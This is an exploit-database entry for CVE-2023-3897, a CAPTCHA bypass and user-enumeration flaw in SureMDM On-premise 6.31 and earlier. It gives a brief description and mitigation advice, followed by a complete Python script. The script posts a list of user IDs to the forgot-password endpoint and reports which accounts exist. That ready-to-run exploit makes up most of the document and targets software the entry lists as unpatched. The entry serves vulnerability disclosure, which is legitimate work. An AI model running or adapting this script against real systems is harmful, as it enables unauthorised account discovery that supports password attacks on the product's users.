SureMDM On-premise CAPTCHA Bypass User Enumeration

vendor:

SureMDM On-premise

by:

Jonas Benjamin Friedli

4.1

CVSS

MEDIUM

CAPTCHA Bypass User Enumeration

285

CWE

Product Name: SureMDM On-premise

Affected Version From: On-premise version <= 6.31

Affected Version To: On-premise version 6.31

Patch Exists: NO

Related CWE: CVE-2023-3897

CPE: a:42gears:suremdm_on-premise:6.31

Metasploit:

Other Scripts:

Platforms Tested:

2023

SureMDM On-premise CAPTCHA Bypass User Enumeration

The SureMDM On-premise version 6.31 and below allows an attacker to bypass CAPTCHA and enumerate users. By sending requests to the /ForgotPassword.aspx/ForgetPasswordRequest endpoint with a User ID, an attacker can check if the User ID exists without being blocked by the CAPTCHA mechanism. This vulnerability has been assigned the CVE-2023-3897.

Mitigation:

To mitigate this vulnerability, it is recommended to implement additional security controls such as rate limiting on user enumeration requests and enhancing the CAPTCHA mechanism to prevent bypass.

Source

Exploit-DB raw data:

# Exploit Title: SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration
# Date: 05/12/2023
# Exploit Author: Jonas Benjamin Friedli
# Vendor Homepage: https://www.42gears.com/products/mobile-device-management/
# Version: <= 6.31
# Tested on: 6.31
# CVE : CVE-2023-3897

import requests
import sys

def print_help():
    print("Usage: python script.py [URL] [UserListFile]")
    sys.exit(1)


def main():
    if len(sys.argv) != 3 or sys.argv[1] == '-h':
        print_help()

    url, user_list_file = sys.argv[1], sys.argv[2]

    try:
        with open(user_list_file, 'r') as file:
            users = file.read().splitlines()
    except FileNotFoundError:
        print(f"User list file '{user_list_file}' not found.")
        sys.exit(1)

    valid_users = []
    bypass_dir = "/ForgotPassword.aspx/ForgetPasswordRequest"
    enumerate_txt = "This User ID/Email ID is not registered."
    for index, user in enumerate(users):
        progress = (index + 1) / len(users) * 100
        print(f"Processing {index + 1}/{len(users)} users ({progress:.2f}%)", end="\r")

        data = {"UserId": user}
        response = requests.post(
            f"{url}{bypass_dir}",
            json=data,
            headers={"Content-Type": "application/json; charset=utf-8"}
        )

        if response.status_code == 200:
            response_data = response.json()
            if enumerate_txt not in response_data.get('d', {}).get('message', ''):
                valid_users.append(user)

    print("\nFinished processing users.")
    print(f"Valid Users Found: {len(valid_users)}")
    for user in valid_users:
        print(user)

if __name__ == "__main__":
    main()